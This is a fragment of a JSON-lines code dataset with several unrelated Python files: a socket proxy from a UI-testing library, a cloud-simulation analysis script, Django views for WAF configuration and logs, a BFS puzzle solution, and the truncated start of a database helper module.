s1.bind(('0.0.0.0', ep1.port))\n s2.bind(('0.0.0.0', ep2.port))\n s1.listen(1)\n s2.listen(1)\n\n c1 = None\n c2 = None\n q1 = [] # c1 -> q2\n q2 = [] # c2 -> q1\n\n print('proxy server started!')\n while True:\n rlist = [s1, s2]\n if c1 is not None:\n rlist.append(c1)\n if c2 is not None:\n rlist.append(c2)\n r, w, x = select.select(rlist, [], [])\n for c in r:\n if c is s1:\n c1, c1_addr = s1.accept()\n print('c1: accept from {}'.format(c1_addr))\n drain(q1, c1)\n elif c is s2:\n c2, c2_addr = s2.accept()\n print('c2: accept from {}'.format(c2_addr))\n drain(q2, c2)\n elif c is c1:\n rxdata = c.recv(RX_SIZE)\n if not rxdata:\n try:\n c1.close()\n except socket.error:\n pass\n c1 = None\n print('c1: disconnected')\n continue\n\n if c2 is not None:\n total_tx = drain(q2, c2)\n c2.sendall(rxdata)\n total_tx += len(rxdata)\n print('c1 -> c2: send data {:06d} B'.format(total_tx))\n else:\n q2.append(rxdata)\n print('c1 -> c2: queue data {:06d} B'.format(len(rxdata)))\n elif c is c2:\n rxdata = c.recv(RX_SIZE)\n if not rxdata:\n try:\n c2.close()\n except socket.error:\n pass\n c2 = None\n print('c2: disconnected')\n continue\n\n if c1 is not None:\n total_tx = drain(q1, c1)\n c1.sendall(rxdata)\n total_tx += len(rxdata)\n print('c2 -> c1: send data {:06d} B'.format(total_tx))\n else:\n q1.append(rxdata)\n print('c2 -> c1: queue data {:06d} B'.format(len(rxdata)))\n\n\nif __name__ == '__main__':\n import sys\n if len(sys.argv) < 3:\n print('Not enough arguments. Please provide at least 2 endpoints.')\n print('e.g. ws://*:15003 tcp://*:15004')\n exit(-1)\n rpt = Repeater(sys.argv[1], sys.argv[2])\n\n while True:\n time.sleep(5)\n","sub_path":"poco/utils/net/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"34079854","text":"#!/usr/bin/env python2.7 \n\nimport numpy as np\nimport csv\nimport ncplotlib as ncplt\nimport matplotlib.pyplot as plt\nimport xarray as xr\nfrom matplotlib import colors\nfrom collections import OrderedDict\n\n\nfrom matplotlib import rc\nrc('text', usetex=True)\nrc('font', **{'family': 'serif', 'serif': ['Computer Modern'], 'size': 10})\n\ndef ds_fix_dims(ds):\n ds = ds.rename({str(u'time_series_4500_1800.0'): 'time_coarse', str(u'time_series_75_60.0'): 'time_fine', str(u'time_series_75_1800.0'): 'time_mid'})\n ds['time_coarse']=ds.time_coarse/3600\n ds['time_mid']=ds.time_mid/3600\n ds['time_fine']=ds.time_fine/3600\n ds['x'] = ds.x.astype(float)/(35)\n ds['y'] = ds.y.astype(float)/(35)\n return ds\n\ndef surf_pre_calc(ds):\n '''\n surface precip domain mean in mm and summed over the simulation time\n '''\n surface_precip_mean = ds.surface_precip_mean*1000\n surface_precip_int = surface_precip_mean.sum()\n return surface_precip_int\n\ndef rwp_calc(ds):\n '''\n rwp domain mean in g m^(-2) and summed over the simulation time\n '''\n rwp_mean = ds.RWP_mean*1000\n rwp_int = rwp_mean.sum()\n return rwp_int\n\ndef rain(ds):\n rwp_int = rwp_calc(ds)\n sp_int = surf_pre_calc(ds)\n return [np.asscalar(rwp_int), np.asscalar(sp_int)]\n\ndef tke_calc(ds): \n tke_mean = ds.reske_mean + ds.subke_mean\n# u_squared_mean = np.mean(np.mean(np.mean(ds.u**2,axis=1),axis=1),axis=1)\n# v_squared_mean = np.mean(np.mean(np.mean(ds.v**2,axis=1),axis=1),axis=1)\n# w_squared_mean = np.mean(np.mean(np.mean(ds.w**2,axis=1),axis=1),axis=1)\n#\n# u_mean_squared = np.mean(np.mean(np.mean(ds.u,axis=1),axis=1),axis=1)**2\n# v_mean_squared = np.mean(np.mean(np.mean(ds.v,axis=1),axis=1),axis=1)**2\n# w_mean_squared = np.mean(np.mean(np.mean(ds.w,axis=1),axis=1),axis=1)**2\n#\n# u_prime_squared_mean = u_squared_mean-u_mean_squared\n# v_prime_squared_mean = v_squared_mean-v_mean_squared\n# w_prime_squared_mean = w_squared_mean-w_mean_squared\n#\t\n# tke_calc = u_prime_squared_mean + v_prime_squared_mean + w_prime_squared_mean \n time_mean = ds.reske_mean[ds.reske_mean.dims[0]].values\n time_calc = ds.u[ds.u.dims[0]].values\n return tke_mean, time_mean\n\ndef lwp_total(ds, hours):\n if include_spinup == True:\n lwp = ds.LWP_mean*1000\n else:\n lwp = ds.LWP_mean[fine_spin:]*1000\n hours -= 1\n \n lwp_last = lwp[last]\n lwp_mean = np.mean(lwp[-fine_ave:])\n lwp_tend = (lwp[last] - lwp[first])/hours\n lwp_teme = (np.mean(lwp[-fine_ave:]) - np.mean(lwp[:fine_ave]))/hours\n tendency = calc_tendency(lwp)\n return [lwp_last, lwp_mean, lwp_tend, lwp_teme], lwp.values, tendency, lwp[lwp.dims[0]].values\n\ndef lwp_smooth(ds, hours):\n '''\n Moving average of the lwp and tendency\n '''\n if include_spinup == True:\n lwp = ds.LWP_mean*1000\n else:\n lwp = ds.LWP_mean[fine_spin:]*1000\n hours-=1\n step = 55\n lwp_smooth = []\n lwp_tend = []\n lwp_tend_smooth = []\n i = 0\n for l in range(1, len(lwp)):\n lwp_tend.append((lwp[l] - lwp[l-1])/(lwp.time_fine[l] - lwp.time_fine[l-1]))\n if l>step-1:\n lwp_smooth.append(lwp[l-step:l].mean())\n if i>0:\n lwp_tend_smooth.append((lwp_smooth[i] - lwp_smooth[i-1])/(lwp.time_fine[l] - lwp.time_fine[l-1]))\n i+=1\n return [lwp_smooth[-1], np.mean(lwp_smooth[-55:]), lwp_tend[-1], np.mean(lwp_tend),\n\t (lwp_smooth[-1]-lwp_smooth[0])/hours]\n\n\ndef lwp_cloud_calc(lmmr, lwp): \n cloudy_lwp = []\n t = []\n #diff = lmmr[-1] - lmmr[0]\n for m in range(len(lmmr)):\n col_mask = layer_cloud_mask(lmmr, m)\n arr_mask = col_mask.values\n lwp_masked = lwp[m].where(arr_mask==1)\n if m==0:\n lwp_masked_first = lwp_masked*1000\n cloud_lwp_mean = lwp_masked.mean(axis=(0,1))\n cloudy_lwp.append(np.asscalar(cloud_lwp_mean.values)*1000)\n t.append(np.asscalar(lmmr[m][lmmr.dims[0]].values)/3600)\n\n lwp_masked = lwp_masked*1000\n lwp_last = lwp_masked.fillna(0)\n lwp_first = lwp_masked_first.fillna(0)\n lwp_diff = lwp_last - lwp_first\n return cloudy_lwp, t, lwp_masked, lwp_diff\n\ndef lwp_cloud(ds, hours):\n if include_spinup == True:\n lwp = ds.lwp\n lmmr = ds.q_cloud_liquid_mass\n else:\n lwp = ds.lwp[coarse_spin:]\n lmmr = ds.q_cloud_liquid_mass[coarse_spin:]\n hours -= 1\n \n cloudy_lwp, times, lwp_masked_last, lwp_diff = lwp_cloud_calc(lmmr, lwp)\n lwp_cloud_last = cloudy_lwp[last]\n lwp_cloud_mean = np.mean(cloudy_lwp[-coarse_ave:])\n lwp_cloud_tend = (cloudy_lwp[last]-cloudy_lwp[first])/hours\n lwp_cloud_teme = (np.mean(cloudy_lwp[-coarse_ave:])-np.mean(cloudy_lwp[:coarse_ave]))/hours\n tendency = calc_tendency(cloudy_lwp, times)\n return [lwp_cloud_last, lwp_cloud_mean, lwp_cloud_tend, lwp_cloud_teme],cloudy_lwp,tendency,times, lwp_masked_last, lwp_diff\n\ndef calc_tendency(dataarray, *times):\n tendency=[]\n if times:\n tseries = times[0]\n else:\n tseries = dataarray[dataarray.dims[0]].values/3600\n dataarray = dataarray.values\n for t_ind in range(1, len(dataarray), 1):\n c_step = dataarray[t_ind]\n p_step = dataarray[t_ind - 1]\n dx = (c_step) - (p_step)\n t = tseries[t_ind] - tseries[t_ind-1]\n if t != 0:\n tendency.append(dx/t)\n else:\n tendency.append(dx/0.01)\n return tendency\n\n\ndef column_cloud_fraction(lmmr):\n cloud_frac=[]\n t =[]\n for m in range(len(lmmr)):\n col_mask = layer_cloud_mask(lmmr, m)\n total = col_mask.sum(axis=(0,1))\n f = np.asscalar(total.values)/(250*250)\n cloud_frac.append(f)\n t.append(np.asscalar(lmmr[m][lmmr.dims[0]].values)/3600)\n return cloud_frac, t\n\ndef clfrac(ds, hours):\n if include_spinup == True:\n lmmr = ds.q_cloud_liquid_mass\n else:\n lmmr = ds.q_cloud_liquid_mass[coarse_spin:]\n hours -= 1\n\n \n cloud_frac, times = column_cloud_fraction(lmmr)\n cloud_frac_last = cloud_frac[last]\n cloud_frac_mean = np.mean(cloud_frac[-coarse_ave:])\n cloud_frac_tend = (cloud_frac[last] - cloud_frac[first])/hours\n cloud_frac_teme = (np.mean(cloud_frac[-coarse_ave:]) -\n\t np.mean(cloud_frac[:coarse_ave]))/hours\n tendency = calc_tendency(cloud_frac, times)\n return [cloud_frac_last, cloud_frac_mean, cloud_frac_tend, cloud_frac_teme], cloud_frac, tendency, times\n\ndef layer_cloud_mask(dataarray, time):\n '''\n Applies mask to each timestep and sums\n '''\n for n in range(110):\n layer = dataarray[time,:,:,n]\n dataarray[time,:,:,n] = layer.where(layer.values<1e-5,1).where(layer.values>1e-5,0)\n col_sum = dataarray[time].sum(axis=2,skipna=True)\n col_mask = col_sum.where(col_sum.values<1,1)\n return col_mask\n\ndef lwp_different(dataarray):\n '''\n extract last lwp\n extract first lwp\n take the difference\n find masked array\n '''\n diff = dataarray[-1] - dataarray[0]\n \n\nppe_path = \"/gws/nopw/j04/carisma/eers/dycoms_sim/PPE/ppe\"\noat_path=\"/gws/nopw/j04/carisma/eers/dycoms_sim/OAT/oat\"\nval_path=\"/gws/nopw/j04/carisma/eers/dycoms_sim/VAL/val\"\nextra_path=\"/gws/nopw/j04/carisma/eers/dycoms_sim/EXTRA/extra\"\nbase_path=\"/gws/nopw/j04/carisma/eers/dycoms_sim/BASE/base/base.nc\"\ndesign = np.loadtxt(\"/home/users/eers/designs/EmulatorInputsDesign2D.csv\",\n\tdelimiter=\",\", skiprows=1)\noat = np.array([[-7.5, 2], [-7.5, 20], [0, 8.5], [-9, 8.5]])\nvalidation = np.loadtxt(\"/home/users/eers/designs/ValidationInputsDesign2D.csv\", delimiter=\",\", skiprows=1)\nextra_design = np.loadtxt(\"/home/users/eers/designs/extra_points.csv\",delimiter=\",\")\nbase = np.array([[-7.5, 8.5]])\n\nppe_no = 20\noat_no = 4\nval_no = 8\nextra_no = 6\nbase_no = 1\n\nod = OrderedDict()\nod[\"ppe\"] = [ppe_no, ppe_path, design]\nod[\"oat\"] = [oat_no, oat_path, oat]\nod[\"val\"] = [val_no, val_path, validation]\nod[\"extra\"] = [extra_no, extra_path, extra_design]\nod[\"base\"] = [base_no, base_path, base]\n\n### Initialise np arrays ###\nlast = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\nmean = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\ntend = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\nteme = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\nrwp = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\nsurface_precip = np.empty((ppe_no+oat_no+val_no+extra_no+base_no, 3))\n\nlwp_last = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\nlwp_mean_lasthr = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\nlwp_tend_last = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\nlwp_tend_ave = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\nlwp_tend_diff = np.empty((ppe_no+oat_no+val_no+extra_no+base_no,3))\n\n#ppe_clfrac = np.empty((ppe_no+val_no+base_no,12))\n#ppe_cltime = np.empty((ppe_no+val_no+base_no,12))\n\narrays = [last, mean, tend, teme]\nrain_arrays = [rwp, surface_precip]\ntesting_arrays = [lwp_last, lwp_mean_lasthr, lwp_tend_last, lwp_tend_ave, lwp_tend_diff]\n\na=0 #\n\n### Options ###\nfirst = 0\nlast = -1\ncoarse_spin = 1 # 1 hour = 1, 2 hours = 2\nfine_spin = 55 # 1 hour = 55, 2 hours = 111\ncoarse_ave = 3\nfine_ave = 111\n\n### Loop through PPE datasets ###\n#calc = 'rain'\ncalc = 'lwp_total'\n#calc = 'lwp_cloud'\n#calc = 'lwp_smooth'\n#calc = 'cloud_frac'\ni=0\nbelow_ppe=[5,6,11,12,14,18]\nbelow_val=[5,6,8]\nbelow_extra=[6] #[5,6]\nlines=[]\ninclude_spinup = True # See fine_spin and coarse_spin for setup\n\nlwp_scenes=[]\nlwp_ppe=[]\nscene_values = [] \n\nfor key in od:\n for j in range(od[key][0]):\n k = j+1\n nc = od[key][1] + str(k) + \"/\" + key + str(k) + \".nc\"\n if key=='base':\n \t nc = base_path \n ds = xr.open_dataset(nc)\n ds = ds_fix_dims(ds)\n \n if key == 'oat': ## for low nd\n hours = 7\n else:\n hours = 8\n #hours = 8 ## for high nd\n \n if calc == 'lwp_total':\n output_array, timeseries, tendency, times = lwp_total(ds, hours)\n \t #time_hrs = times[1:]\n time_hrs = times\n elif calc == 'lwp_cloud':\n output_array, timeseries, tendency, times, lwp_masked_last, lwp_diff = lwp_cloud(ds, hours)\n \t #time_hrs = times[1:]\n time_hrs = times\n #lwp_diff = lwp_diff.transpose() ## scene difference from start to end\n #np.savetxt(\"lwp_scenes_diff/lnd_lwp_scene_diff_%s%s.csv\"%(key,k),lwp_diff.values, delimiter=',')\n elif calc == 'lwp_smooth':\n output_array = lwp_smooth(ds, hours) \n elif calc == 'cloud_frac':\n \t output_array, timeseries, tendency, times = clfrac(ds, hours)\n \t #time_hrs = times[1:]\n \t time_hrs = times\n elif calc == 'rain':\n \t output_array = rain(ds)\n else:\n print('Select calc')\n break\n\n if calc in ['cloud_frac','lwp_cloud','lwp_total']:\n \t for b, array in enumerate(arrays):\n array[i, 0] = od[key][2][j][1]\n array[i, 1] = od[key][2][j][0]\n array[i, 2] = output_array[b]\n elif calc == 'rain':\n \t for b, array in enumerate(rain_arrays):\n \t array[i, 0] = od[key][2][j][1]\n \t array[i, 1] = od[key][2][j][0]\n \t array[i, 2] = output_array[b]\n elif calc == 'lwp_smooth':\n for b, array in enumerate(testing_arrays):\n array[i, 0] = od[key][2][j][1]\n array[i, 1] = od[key][2][j][0]\n array[i, 2] = output_array[b]\n\n if key=='ppe':\n lwp_ppe.append(timeseries)\n elif key=='base':\n base=timeseries\n\t### three quotes here\n np.savetxt('{}{}_timeseries.csv'.format(key,str(k)),timeseries,delimiter=',')\n np.savetxt('{}{}_times.csv'.format(key,str(k)),time_hrs,delimiter=',')\n ds.close()\n print(i)\n i+=1\n a+=1 #\n\t\n#ax.legend((lines[10],lines[7],lines[24],lines[20],lines[0],lines[11]), ('below line ppe', 'above line ppe', 'below line val', 'above line val','outlier','corrupt'), loc=\"upper left\", fontsize=10)\n#ax.legend((lines[6],lines[7],lines[24],lines[25]), ['below line ppe', 'above line ppe', 'below line val', 'above line val'], loc=\"upper left\", fontsize=10)\n'''\nif calc == 'rain':\n np.savetxt(\"dycoms_data_%s_rwp.csv\"%calc, rain_arrays[0], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_surfpre.csv\"%calc, rain_arrays[1], delimiter=\",\")\nelif calc == 'lwp_smooth':\n np.savetxt(\"dycoms_data_%s_lwp_last.csv\"%calc, testing_arrays[0], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_lwp_mean_lasthr.csv\"%calc, testing_arrays[1], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_lwp_tend_last.csv\"%calc, testing_arrays[2], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_lwp_tend_ave.csv\"%calc, testing_arrays[3], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_lwp_tend_diff.csv\"%calc, testing_arrays[4], delimiter=\",\")\nelse:\n np.savetxt(\"dycoms_data_%s_last.csv\"%calc, arrays[0], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_mean.csv\"%calc, arrays[1], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_tend.csv\"%calc, arrays[2], delimiter=\",\")\n np.savetxt(\"dycoms_data_%s_teme.csv\"%calc, arrays[3], delimiter=\",\")\n#np.savetxt(\"ppe_lwp_timeseries.csv\", lwp_ppe, fmt='%s', delimiter=',')\n'''\n### Variability ###\n\nvar_path = \"/gws/nopw/j04/carisma/eers/dycoms_sim/INT_VAR/\"\npoints = {\"thick\":\"Highest LWP\",\"kparam\":\"On $\\kappa$ line\", \"thin\":\"Lowest LWP\"}\n\n### Create lists ###\ne_last=[]\ne_mean=[]\ne_tend=[]\ne_teme=[]\nlines=[]\ni=0\n\nfor point in points:\n if point=='kparam':\n colour = (238/255, 27/255, 155/255)\n elif point=='thick':\n colour = (255/255, 211/255, 29/255)\n elif point=='thin':\n colour = (26/255, 224/255, 203/255)\n\n for i in range(5):\n name = point + str(i+1)\n nc = var_path + point + \"/\" + name + \"/\" + name + \".nc\" \n ds = xr.open_dataset(nc)\n\n hours = 8\n\n if calc == 'lwp_total':\n output_array, timeseries, tendency, times = lwp_total(ds, hours)\n time_hrs = times/3600\n elif calc == 'lwp_cloud':\n output_array, timeseries, tendency, times,lwp_masked = lwp_cloud(ds, hours)\n time_hrs = times\n np.savetxt(\"lwp_scenes_values_intvar_%s.csv\"%(name), lwp_masked.values, delimiter=',')\n elif calc == 'cloud_frac':\n output_array, timeseries, tendency, times = clfrac(ds, hours)\n time_hrs = times\n else:\n print(\"Select calc\")\n break\n\n np.savetxt('{}{}_timeseries.csv'.format(point,str(i+1)), timeseries,delimiter=',')\n np.savetxt('{}{}_times.csv'.format(point,str(i+1)),time_hrs,delimiter=',')\n\n e_last.append(output_array[0])\n e_mean.append(output_array[1])\n e_tend.append(output_array[2])\n e_teme.append(output_array[3])\n print(point + ' finished') \n\noutput_type=e_mean\n#thick_mean = \"{:.2f}\".format(np.mean(output_type[0:4]))\n#kparam_mean = \"{:.2f}\".format(np.mean(output_type[5:9]))\n#thin_mean = \"{:.2f}\".format(np.mean(output_type[10:14]))\n#thick_var = \"{:.2f}\".format(np.var(output_type[0:4]))\n#kparam_var = \"{:.2f}\".format(np.var(output_type[5:9]))\n#thin_var =\"{:.2f}\".format(np.var(output_type[10:14]))\n#labels = \"%s, $\\mu = %s,\\; \\sigma^{2} = %s$\"\n\n#np.savetxt('ensemble_%s.csv'%calc, [e_last, e_mean, e_tend, e_teme], delimiter=',')\n","sub_path":"ppe_postproc.py","file_name":"ppe_postproc.py","file_ext":"py","file_size_in_byte":15320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"620342027","text":"\nimport os\nimport xlwt\nimport datetime\nfrom urllib.parse import unquote, urlparse\n\nfrom django.conf import settings\nfrom django.http import StreamingHttpResponse\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.decorators import login_required\n\n\nfrom common.decorators import rights_required\nfrom common.feed import (AccountsFeed as af, OperateMsg as om, APIUrl,\n DEFAULT_RULE_CONF, WAF_ATTACK_TYPE)\nfrom common.country_conf import COUNTRY_NAME_CONF, COUNTRY_ABBREVIATION_CONF\nfrom common.functions import (json_response, int_check, data_pagination,\n make_error_file, timestamp_to_str, str_to_datetime,\n datetime_to_str)\n\nfrom base.models import UserProfile, Domain, OperateLog\nfrom security.ajax.base_ajax import (user_get_waf_default_rule,\n user_get_waf_self_rule,\n user_reset_default_rule,\n user_enable_default_rule,\n user_enable_self_rule,\n user_get_log_list, user_download_log,\n user_get_log_detail,\n user_get_waf_statistics,\n user_download_time_cnt,\n user_download_ip_list,\n user_download_rule_list)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_sec_domain_list(request):\n\n msg = ''\n status = False\n\n res = {\n 'status': status,\n 'msg': msg\n }\n\n url = request.POST.get('domain', '')\n\n url_info = urlparse(url)\n protocol = url_info.scheme\n netloc = url_info.netloc\n path = url_info.path\n\n try:\n user = request.user\n\n domain_query = Domain.objects.filter(user=user)\n\n if url:\n if protocol and netloc:\n domain_query = domain_query.filter(\n protocol=protocol, domain=netloc)\n else:\n domain_query = domain_query.filter(domain__contains=path)\n\n domain_name_list = [i.domain for i in domain_query]\n\n body = {\n 'domain_list': domain_name_list\n }\n\n api_res = APIUrl.post_link('domain_query', body)\n api_domain_query = api_res.get('domain_query', [])\n\n domain_dict_list = []\n for domain_obj in domain_query:\n\n url = '%s://%s' % (domain_obj.protocol, domain_obj.domain)\n\n if url not in api_domain_query:\n continue\n\n domain_info = api_domain_query.get(url, {})\n\n user_id = domain_info.get('user_id')\n user = UserProfile.objects.filter(id=user_id).first()\n\n # waf标记\n is_waf = 0\n waf_info = domain_info.get('waf', [])\n if waf_info:\n is_waf = 1\n\n domain_dict = {\n 'username': user.username,\n 'WAF': is_waf,\n 'domain_id': domain_obj.id,\n 'channel_name': url\n }\n if is_waf:\n #---get domain status info.\n '''\n 0:显示“开通waf”\n 1:显示“待审核”\n 2:显示“审核不通过”\n 3:显示“配置”+“统计”\n '''\n status_from_api = APIUrl.post_link('get_domain_status', {'channel': url})\n if status_from_api['return_code'] == 0:\n channel_status = status_from_api['data'].get('status', 0)\n domain_dict['WAF'] = channel_status\n else:\n print(f'parent_get_sec_domain_list[get_domain_status api error.] channel: {url}')\n\n domain_dict_list.append(domain_dict)\n\n check_msg, domain_dict_list, pagination = data_pagination(\n request, domain_dict_list)\n\n if check_msg:\n res['msg'] = _(check_msg)\n return json_response(res)\n\n res['domain_list'] = domain_dict_list\n res['page_info'] = pagination\n\n status = True\n\n except Exception as e:\n res['msg'] = e\n\n res['status'] = status\n\n return json_response(res)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_waf_base_conf(request):\n \"\"\"父账号获取waf基本配置\"\"\"\n\n msg = ''\n status = False\n\n res = {\n 'status': status,\n 'msg': msg\n }\n\n provider = 'QINGSONG'\n\n domain_id = request.POST.get('domain_id', '')\n\n try:\n if not domain_id:\n msg = af.DOMAIN_NOT_EXIST\n assert False\n\n domain_obj = Domain.objects.filter(id=domain_id).first()\n if not domain_obj:\n msg = af.DOMAIN_NOT_EXIST\n assert False\n\n body = {\n 'channel': '%s://%s' % (domain_obj.protocol, domain_obj.domain),\n }\n api_res = APIUrl.post_link('get_waf_base_info', body)\n\n if api_res[provider]['return_code'] == 0:\n api_res = api_res[provider]\n try:\n default_waf_mode = int(api_res.get('default_waf_mode', 0))\n except Exception as e:\n print(e)\n default_waf_mode = 0\n\n try:\n self_waf_mode = int(api_res.get('self_waf_mode', 0))\n except Exception as e:\n print(e)\n self_waf_mode = 0\n\n base_conf = {\n 'is_https': int(api_res.get('is_https', False)),\n 'default_waf_mode': default_waf_mode,\n 'self_waf_mode': self_waf_mode\n }\n\n res['base_conf'] = base_conf\n\n status = True\n\n except AssertionError:\n res['msg'] = _(msg)\n\n res['status'] = status\n\n return json_response(res)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_set_defense_mode(request):\n \"\"\"父账号自己设置规则防御模式\"\"\"\n msg = ''\n status = False\n\n res = {\n 'status': status,\n 'msg': msg\n }\n\n provider = 'QINGSONG'\n\n domain_id = request.POST.get('domain_id', '')\n\n default_waf_mode = request.POST.get('default_waf_mode', '')\n self_waf_mode = request.POST.get('self_waf_mode', '')\n\n try:\n domain_obj = Domain.objects.filter(id=domain_id).first()\n if not domain_obj:\n msg = af.DOMAIN_NOT_EXIST\n assert False\n\n body = {\n 'channel': '%s://%s' % (domain_obj.protocol, domain_obj.domain),\n }\n\n if default_waf_mode:\n default_waf_mode = int_check(default_waf_mode)\n if default_waf_mode is None:\n msg = af.PARAME_ERROR\n assert False\n\n body['default'] = 1\n body['switch'] = default_waf_mode\n log_msg = om.SET_DEFAULT_RULE_MODE % (\n request.user.username, domain_obj.domain, default_waf_mode)\n\n elif self_waf_mode:\n self_waf_mode = int_check(self_waf_mode)\n if self_waf_mode is None:\n msg = af.PARAME_ERROR\n assert False\n\n body['default'] = 0\n body['switch'] = self_waf_mode\n\n log_msg = om.SET_SELF_RULE_MODE % (\n request.user.username, domain_obj.domain, self_waf_mode)\n\n api_res = APIUrl.post_link('set_defense_mode', body)\n if api_res[provider]['return_code'] == 0:\n status = True\n\n OperateLog.write_operate_log(request, om.SECURITY, log_msg)\n\n except AssertionError:\n res['msg'] = _(msg)\n\n res['status'] = status\n\n return json_response(res)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_waf_default_rule(request):\n \"\"\"父账号获取默认规则\"\"\"\n return user_get_waf_default_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_waf_self_rule(request):\n \"\"\"父账号获取自定义规则\"\"\"\n return user_get_waf_self_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_reset_default_rule(request):\n \"\"\"父账号自己设置全部默认规则开关\"\"\"\n return user_reset_default_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_enable_default_rule(request):\n \"\"\"父账号自己设置默认规则\"\"\"\n return user_enable_default_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_enable_self_rule(request):\n \"\"\"父账号自己设置自定义规则\"\"\"\n return user_enable_self_rule(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_log_list(request):\n \"\"\"父账号自己查看日志\"\"\"\n return user_get_log_list(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_log_detail(request):\n \"\"\"父账号查看日志详情\"\"\"\n\n return user_get_log_detail(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_download_log(request, domain_id, atk_ip,\n start_time, end_time, log_rows):\n \"\"\"父账号下载日志\n {'action': 'waf_report', 'message': 'success',\n 'data': {'cur_page': 70, 'log_rows': 1381, 'waf_log': [], 'page_cnt': 70},\n 'return_code': 0}\n \"\"\"\n return user_download_log(request, domain_id, atk_ip,\n start_time, end_time, log_rows)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_waf_statistics(request):\n \"\"\"父账号查看统计数据\"\"\"\n return user_get_waf_statistics(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_download_time_cnt(request, domain_id, start_time, end_time):\n \"\"\"父账号下载拦截攻击次数excel\"\"\"\n return user_download_time_cnt(request, domain_id, start_time, end_time)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_download_ip_list(request, domain_id, start_time, end_time):\n \"\"\"父账号下载拦截攻击来源\"\"\"\n return user_download_ip_list(request, domain_id, start_time, end_time)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_download_rule_list(request, domain_id, start_time, end_time):\n \"\"\"父账号下载攻击方式\"\"\"\n return user_download_rule_list(request, domain_id, start_time, end_time)\n","sub_path":"security/ajax/client_ajax.py","file_name":"client_ajax.py","file_ext":"py","file_size_in_byte":10556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"459337073","text":"import sys\na,b = list(map(int,sys.stdin.readline().split()))\n\nroom = [False]*100001\ndef BFS(a,b):\n count = 0\n visited,need_visit = list(),list()\n need_visit.append(a)\n while need_visit:\n \n temp_list = []\n for i in need_visit:\n if i == b:\n print(count)\n return\n if i*2 <= 100000 and room[i*2] == False:\n room[i*2] = True\n temp_list.append(i*2)\n if i>0 and room[i-1] == False:\n room[i-1] = True\n temp_list.append(i-1)\n if i <100000 and room[i+1] == False:\n room[i+1] = True\n temp_list.append(i+1)\n count +=1 \n need_visit = temp_list\nBFS(a,b)","sub_path":"practice/1697_숨바꼭질.py","file_name":"1697_숨바꼭질.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"171768454","text":"import functools\nfrom sqlalchemy.sql import select, and_, func, between, distinct, text\nfrom easyapi_tools.util import str2hump, type_to_json\nfrom .db_util import MysqlDB\nfrom sqlalchemy.exc import NoSuchColumnError\nimport datetime\n\n\nclass Transaction():\n def __init__(self, db: MysqlDB):\n self._db = db\n self._transaction = None\n self._connect = None\n\n async def __aenter__(self):\n self._connect = await self._db._engine.acquire()\n self._transaction = await self._connect.begin()\n return self._connect\n\n async def __aexit__(self, exc_type, exc, tb):\n try:\n await self._transaction.commit()\n except Exception as e:\n await self._transaction.rollback()\n raise e\n finally:\n await self._connect.close()\n\n\ndef get_tx(db: MysqlDB):\n return Transaction(db)\n\n\ndef search_sql(sql, query: dict, table):\n for k in query.keys():\n if type(query[k]) is not list:\n # 兼容处理\n values = [query[k]]\n else:\n values = query[k]\n if k.startswith('_gt_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[4:]) > v)\n elif k.startswith('_gte_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[5:]) >= v)\n elif k.startswith('_lt_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[4:]) < v)\n elif k.startswith('_lte_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[5:]) <= v)\n elif k.startswith('_like_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[6:]).like(v + '%'))\n elif k.startswith('_in_'):\n sql = sql.where(getattr(table.c, k[4:]).in_(values))\n else:\n sql = sql.where(getattr(table.c, k) == values[0])\n return sql\n\n\nclass DaoMetaClass(type):\n \"\"\"\n dao的元类 读取 db 和 table信息 生成\n \"\"\"\n\n def __new__(cls, name, bases, attrs):\n \"\"\"\n\n :param name:\n :param bases:\n :param attrs:\n :return:\n \"\"\"\n if \"BaseDao\" in name:\n return type.__new__(cls, name, bases, attrs)\n if attrs.get('__db__') is None:\n raise NotImplementedError(\"Should have __db__ 